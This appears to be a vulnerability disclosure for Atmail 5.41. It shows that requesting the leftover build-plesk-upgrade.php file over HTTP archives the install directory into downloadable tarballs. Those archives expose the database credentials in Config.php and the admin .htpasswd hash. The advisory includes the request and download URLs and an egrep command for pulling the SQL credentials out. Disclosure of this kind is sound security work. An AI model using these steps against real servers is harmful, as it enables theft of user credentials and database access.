@Mail PHP Version 5.41 patch Release
http://atmail.com/demo/atmailphpdemo.tgz
The default install of Atmail 5.41 creates the following
file in the atmail/ directory: build-plesk-upgrade.php
If that file is called via http, such as: http://example.com/atmail/build-plesk-upgrade.php
it will execute on the local server as expected:
nobody 19495 11.3 0.0 22572 8908 ? S 17:25 0:00 /usr/bin/php
/usr/local/apache/htdocs/atmail/build-plesk-upgrade.php
producing numerous warnings and errors:
building @Mail-Plesk Pro upgrade
Warning: mkdir() [function.mkdir]: Permission denied in /usr/local/apache/htdocs/atmail/build-plesk-upgrade.php on
line 32
making . dir… making /usr/local/atmail-plesk-upgrade/.
and when complete the following files will exist:
/usr/local/apache/htdocs/atmail:
-rw-r–r-- 1 nobody nobody 101754880 Jul 30 17:26 files.tar
-rw-r–r-- 1 nobody nobody 27162656 Jul 30 17:26 plesk-atmail-upgrade.tgz
Those files are the contents of the atmail/ directory. The plesk-atmail-upgrade.tgz
only contains the files.tar file.
Either file could then be downloaded:
http://example.com/atmail/files.tar
http://example.com/atmail/plesk-atmail-upgrade.tgz
or copied to another directory on the server for browsing through. The information
contained in those files includes the Atmail Config.php file which stores the Atmail
database username, password, and database server hostname in plain text:
$ egrep 'sql_(user|host|pass)' libs/Atmail/Config.php
'sql_host' => 'localhost',
'sql_pass' => '43s2H4N55X',
'sql_user' => 'atmail',
This information could then be used to access the Atmail database to obtain client credentials,
such as email addresses, usernames, passwords, session IDs, and more.
Also in the files.tar file is the webadmin/.htpasswd file, which contains the administrator
user's username and password hash.